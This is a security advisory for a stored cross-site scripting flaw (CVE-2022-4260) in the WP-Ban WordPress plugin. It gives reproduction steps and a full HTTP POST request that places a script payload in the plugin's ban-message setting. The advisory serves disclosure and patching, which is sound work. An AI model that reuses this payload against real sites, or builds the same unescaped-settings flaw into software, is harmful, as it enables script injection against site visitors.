WP-Ban < 1.69.1 – Admin+ Stored XSS | CVE 2022-4260

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Proof of Concept

1. Go to the plugin settings and set these fields: In "Banned Referrers", add "xss" and in "Banned Message", add "<script>alert(123);</script>"

2. Go to the website's homepage using Burp Suite and its Interceptor.

3. Intercept the request, change the "referrer" to "xss" and confirm the request. The alert triggers successfully.
 
The request is:
 
POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1

_wpnonce=<nonce key>&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_option_reverse_proxy=1&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=xss&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit=Save+Changes










-video: https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
=======
You need to trigger a `ban rule` to display the `ban message`.
For example, I set the `ban rule` to let the `referer` not equal to `xss`.
The package is like this:
```http
POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
...
_wpnonce=c298ada8b0&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_option_reverse_proxy=1&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=xss&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit=Save+Changes
```
We set the `banned_referers=xss`, and the payload in the parameter `banned_template_message`.

Then go to the main page, refresh the page, and set the referer as `xss`, the vulnerability will be triggered.